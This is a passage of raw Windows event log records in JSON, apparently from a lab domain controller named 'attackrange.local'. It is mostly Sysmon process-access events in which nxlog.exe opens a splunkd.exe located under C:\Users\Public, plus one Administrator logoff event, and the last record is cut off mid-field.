{"EventTime":"2020-08-01 06:56:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6329,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:49.541\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:49.541","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220668,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x80B5F\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x80b5f","LogonType":"3","EventReceivedTime":"2020-08-01 06:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6330,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:50.541\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:50.541","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6331,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:51.541\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:51.541","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6332,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:52.541\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:52.541","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6333,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:53.541\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:53.541","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6334,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:54.542\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:54.542","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6335,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:55.542\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 